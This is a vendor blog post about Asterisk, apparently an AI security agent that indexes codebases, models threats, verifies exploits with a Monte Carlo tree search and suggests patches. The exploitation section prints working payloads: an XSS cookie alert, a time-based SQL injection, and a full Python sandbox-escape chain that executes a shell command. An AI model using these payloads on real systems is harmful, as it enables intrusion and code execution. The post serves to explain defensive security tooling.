Insights

How Asterisk Works

Mufeed VH

Aug 30, 2024

Table of Contents

  • What is Asterisk?

  • The Asterisk Process

    1. Indexing

    2. Contextualization

    3. Threat Modeling

    4. Vulnerability Scanning & Analysis

    5. Exploitation & Verification

      1. MCTSr (Monte Carlo Tree Self-refine)

    6. Patching

    7. Reporting

  • Public Results

  • Try Asterisk at your company

What is Asterisk?

Asterisk is an AI Agent that finds, verifies, and patches security vulnerabilities in codebases. It can find business logic errors with context-aware scanning and generate reports with near-zero false positives.

The Asterisk Process

Asterisk utilizes a six-step process to find security vulnerabilities in codebases with high accuracy. Let’s explore each step in technical detail.

1. Indexing

Asterisk starts by indexing your codebase. We wrote an algorithm that combines static indexing with tree-sitter and an LLM agent that walks your code to create a complete mapping of your codebase with accurate call stack and code graph generation.

Let’s demonstrate this with a fun example.

Indexing the old HackerNews codebase

The old HackerNews codebase from nine years ago is up on GitHub. It is written in Arc, a dialect of Lisp created by Paul Graham and Robert Morris.

There are no AST indexers or parsers for Arc implemented with tree-sitter. So, the way to create an AST for programs written in Arc is to write a tree-sitter parser on our own or somehow write a hacky FFI implementation for the Arc compiler.

This isn’t ideal. We aim to support any given programming language using a language-agnostic indexer that requires zero engineering effort to write parsers to extend support.

We achieved this by implementing a code graph constructing algorithm that gets filled as an LLM walks through the code. Our implementation isn’t limited by the LLM's context window or cost. With a way to structure any code into the same format (a variant of the tree-sitter grammar), we could convert large source files into smaller chunks while still maintaining accuracy for call stack generation.

Let’s index the HackerNews codebase with Asterisk.

The above image is a part of the large GraphViz DOT representation of the HackerNews Arc codebase generated by Asterisk.

This step is crucial for the process forward, as Asterisk can recall the call stack for each function to see how user input travels through the logic. This is also how Asterisk can create payloads that bypass validations and reach into the vulnerable code snippet with high accuracy.

For example, for the function handle-request, this is what the call stack looks like:

Function handle-request

(def handle-request (s breaksrv)
  (if breaksrv
      (handle-request-1 s)
      (errsafe (handle-request-1 s))))

Incoming Functions:

  1. serve

(def serve ((o port 8080))
  (wipe quitsrv*)
  (ensure-srvdirs)
  (map [apply new-bgthread _] pending-bgthreads*)
  (w/socket s port
    (prn "ready to serve port " port)
    (flushout)
    (= currsock* s)
    (until quitsrv*
      (handle-request s breaksrv*)))
  (prn "quit server"))
  1. serve1

(def serve1 ((o port 8080))
  (w/socket s port (handle-request s t)))

Outgoing Functions:

  1. handle-request-1

(def handle-request-1 (s)
  (let (i o ip) (socket-accept s)
    (if (and (or (ignore-ips* ip) (abusive-ip ip))
             (++ (spurned* ip 0)))
        (force-close i o)
        (do (++ requests*)
            (++ (requests/ip* ip 0))
            (with (th1 nil th2 nil)
              (= th1 (thread
                       (after (handle-request-thread i o ip)
                              (close i o)
                              (kill-thread th2))))
              (= th2 (thread
                       (sleep threadlife*)
                       (unless (dead th1)
                         (prn "srv thread took too long for " ip))
                       (break-thread th1)
                       (force-close i o))))))))

This outgoing function handle-request-1 calls abusive-ip, handle-request-thread and so on.

Asterisk has the complete code graph for any given codebase. This is how it can traverse any function to show how an exploit payload travels through your code.

Example of a pain point solved:

Existing SAST / static analysis tools work like a semantic grep where it searches for vulnerable code patterns. For example, it would search for the string “pickle.loads()” and would conclude that there is an Insecure Deserialization vulnerability but cannot verify if a user input ever goes into it or if the input is validated before it reaches this part of the code. This is why SAST tools produce a lot of noise, resulting in high rates of false positives.

2. Contextualization

The second step is to build context on what the codebase is meant to do. During indexing, our AI agent learns the code's functionality being parsed. This memory is then used to write a detailed Specification Sheet for the codebase. With our current implementation, Asterisk can write accurate specification sheets even for codebases with no comments or proper structure detailing the functionality and limitations.

This step is utilized to build a Threat Model around the codebase.

Why?

Human Security Engineers audit a codebase for security vulnerabilities by understanding what the software is meant to do. Thus, the way we analyze a “Social media” app and a “Banking app” differs greatly. We devise context-aware attack scenarios like “Can I withdraw money from my bank without affecting my balance?” for banking apps and “Can I log in as Mark Zuckerberg on Facebook?” for social media apps.

And it’s not just the industry or field that requires proper contextualization; “where” the software is supposed to run is also an important part of the equation.

Asterisk can differentiate between Web Apps, IoT firmware, Mobile Apps, etc., build context-aware threat models, and create realistic attack scenarios.

3. Threat Modeling

This is where LLMs' tendency to hallucinate becomes a breakthrough feature. With the context built around the scanned codebase, Asterisk generates various attack scenarios for the “Exploiter” agent to try. Since Asterisk has context on each function, it generates multi-chain attack scenarios with real impact.

Some examples would be:

  • This application uses the ElevenLabs API to generate text-to-speech and omits rate limiting for paid users. If an attacker becomes a paid user and then abuses this endpoint to process unlimited text-to-speech generations, the customer's ElevenLabs API bills will rack up, and the attacker will gain free and indirect access to the ElevenLabs API.

  • The endpoint /fetch-resume accepts a UUID of a user to fetch their resume document, but it does not validate whether the UUID belongs to the currently logged-in user, resulting in an IDOR (Insecure direct object references) vulnerability. Even though UUIDs are hard to brute-force, there should be proper isolation such that a user cannot fetch other users' resumes with their UUIDs.

These attack scenarios are then passed to the “Analyzer” agent, which reads the code to ensure the attack is exploitable. The “Exploiter” agent then verifies the attack by creating a PoC (proof of concept) exploit that shows how this attack can take place via a sandbox simulation.

4. Vulnerability Scanning & Analysis

There are two types of security vulnerabilities: “technical vulnerabilities” and “business logic errors.” Let’s define the two before we discuss how Asterisk detects them.

Technical Vulnerabilities include SQL Injection, XSS (Cross-site Scripting), CSRF (Cross-site Request Forgery), SSRF (Server-side Request Forgery), and others.

Business Logic Errors are vulnerabilities that can result in financial loss or data loss to a company via a logic issue as minute as an “off-by-one” error. This could also be a side effect of a technical vulnerability like IDOR (Insecure direct object references).

How are vulnerabilities found and flagged by Asterisk

  • Static Rules: Asterisk has a large set of static rules that detail vulnerable code patterns, which are then used to semantically search if a given codebase uses them.

  • CVEs and N-days: Asterisk has knowledge of pretty much every CVE and N-day documented in open-source software (OSS). With a proprietary search algorithm for code embeddings, Asterisk can see if a given codebase is vulnerable to a similar vulnerability documented in the past, no matter how differently the logic is implemented. How this is done accurately is part of our secret sauce.

  • Threat Modeling: Asterisk comes up with realistic attack scenarios that affect your business logic and verifies them by combining exploit chains to create proof-of-concepts.

  • Supply Chain Monitoring: Asterisk keeps track of vulnerabilities in dependencies used in your codebase.

Combined with a lot of data on how vulnerabilities occur in various logic, be it email validation or rate limiting, Asterisk flags insecure implementations and comes up with an attack scenario utilizing the implemented logic to convey impact.

5. Exploitation & Verification

Asterisk verifies the existence of discovered vulnerabilities by actually exploiting them against your software running in a sandbox environment. This ensures that the attack scenarios generated by Asterisk are not false positives.

You can give Asterisk access to your staging deployment to see how an attacker would exploit every finding raised by Asterisk. Asterisk can also deploy just the relevant parts of your codebase to generate PoCs inside a secure sandbox akin to a simulation, just like Code Interpreter.

Even without this step, Asterisk can generate valid PoCs and exploitation steps for a given finding since it has all the context needed (call stack, threat model, specification, etc.) to create a step-by-step exploit.

MCTSr (Monte Carlo Tree Self-refine)

The verification process for complex attacks is essentially performing a proof-of-concept exploit that demonstrates an apparent impact. The "proof" or "win function" here is inferred from the output.

For XSS attacks, this could be an alert pop-up for the payload "><script>alert(document.cookie);</script>. And for exploits that do not "show" an output, this could be another parameter like the response time. For example, a Time-based Blind SQL Injection payload such as id=1337 AND SLEEP(5); -- would result in the response time being delayed by 5 seconds.

Now that we have defined what the win function would look like, we can create a quasi-evaluation suite.

Asterisk's Verification/Exploitation Agent is a variation of the MCTSr algorithm from the paper "Accessing GPT-4 level Mathematical Olympiad Solutions via Monte Carlo Tree Self-refine with LLaMa-3 8B" (arXiv:2406.07394) but instead of solving Mathematical Olympiad Problems, we are solving vulnerability exploit chains.

A Simple Sandbox Escape Example

The above Monte Carlo feedback flow shows a simplified example of crafting a payload that escapes an insecure sandbox implemented in Python, leading to code execution. The custom win function here is to "pop a calc" or open the calculator app to demonstrate the code execution in hacker/Pwn2Own style.

The vulnerable Python Sandbox implementation:
import builtins
import types
import io
import sys

# Define a list of allowed built-in functions
ALLOWED_BUILTINS = [
    'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'bytearray', 'bytes', 'chr',
    'dict', 'divmod', 'enumerate', 'filter', 'float', 'format', 'frozenset',
    'hash', 'hex', 'int', 'isinstance', 'getattr', 'hasattr', 'issubclass', 'iter', 'len', 'list',
    'map', 'max', 'min', 'next', 'oct', 'ord', 'pow', 'print', 'range',
    'repr', 'reversed', 'round', 'set', 'slice', 'sorted', 'str', 'sum',
    'tuple', 'type', 'zip'
]

# Create a restricted __builtins__ dictionary
safe_builtins = {name: getattr(builtins, name) for name in ALLOWED_BUILTINS}

# Add some safe modules
safe_builtins['math'] = __import__('math')

class RestrictedEnvironment:
    def __init__(self):
        self.globals = {
            '__builtins__': safe_builtins,
        }

    def execute(self, code):
        old_stdout = sys.stdout
        sys.stdout = io.StringIO()
        try:
            # Compile the code
            compiled_code = compile(code, '<string>', 'exec')

            # Check for forbidden names
            for name in compiled_code.co_names:
                if name not in self.globals['__builtins__']:
                    raise NameError(f"Use of '{name}' is not allowed in the sandbox")

            # Execute the code
            exec(compiled_code, self.globals)
            output = sys.stdout.getvalue()
            return output
        except Exception as e:
            print(f"Error: {str(e)}")
            return f"Error: {str(e)}"
        finally:
            sys.stdout = old_stdout

def run_in_sandbox(code):
    sandbox = RestrictedEnvironment()
    return sandbox.execute(code)
Final Payload:
print(getattr(getattr([c for c in getattr(getattr(getattr(str,'__class__'),'__base__'),'__subclasses__')() if hasattr(c,'eval')][0](),'eval'),'__call__')("__import__('os').system('open -a Calculator')") if [c for c in getattr(getattr(getattr(str,'__class__'),'__base__'),'__subclasses__')() if hasattr(c,'eval')] else "No eval method found")

The hardest problem we had to solve was defining the win function or instructing the agent on how that would look, which requires additional reasoning before starting the MCTSr verification. Currently, we have created a large set of evaluation rules from various proof-of-concept exploits. For out-of-band vulnerabilities, error-based vulnerabilities, and so on.

The Monte Carlo Tree Self-refine approach demonstrates effectiveness in systematically exploring and refining payloads to exploit complex vulnerabilities. By combining MCTS's exploration capabilities with the refinement and evaluation processes, the algorithm can discover complex exploit chains that may be difficult to identify through Chain-of-Thought (CoT) reasoning or N-shot attempts alone.

6. Patching

After all the vulnerabilities are found, Asterisk writes patch suggestions (fix code) for each with the same code style observed in your codebase. You can get this in the form of .patch files, saving remediation time by coming up with robust fixes.

Asterisk also provides alternative fix suggestions other than the patch code provided.

7. Reporting

Asterisk does the above impressive steps in the background; reporting is the part our users see. After indexing, scanning, and exploiting every finding, Asterisk generates a comprehensive report detailing every vulnerability discovered in the form of a Dashboard and a report document.

Public Results

Asterisk has discovered vulnerabilities in various open-source software that we responsibly disclosed to their respective maintainers. Most of them are currently being remedied. For the ones we can publicly talk about (the ones that are patched), Read about the Sandbox Escape in Hoppscotch, Stored XSS, Host Header Injection, Lack of Rate Limiting, and Improper Input Validation in Khoj.

Asterisk has discovered more open-source vulnerabilities (soon to be CVEs), which will soon be posted on this website's "Trophies" page when we can talk about them.

Try Asterisk at your company

Asterisk is in its early stages, and we are improving it every day. We are a team of security researchers and competitive CTF players who are super passionate about this problem. Our sole goal is to make Asterisk the state-of-the-art code vulnerability scanner.

We are proud to be backed by Y Combinator, who believes in our mission.

If you are interested in getting secured by Asterisk, please feel free to Book a Demo Call with us.

PS: This article omits a lot of important technical details that are proprietary or are kept as business secrets.

Mufeed VH

Mufeed VH

Mufeed VH

Mufeed VH

Share this post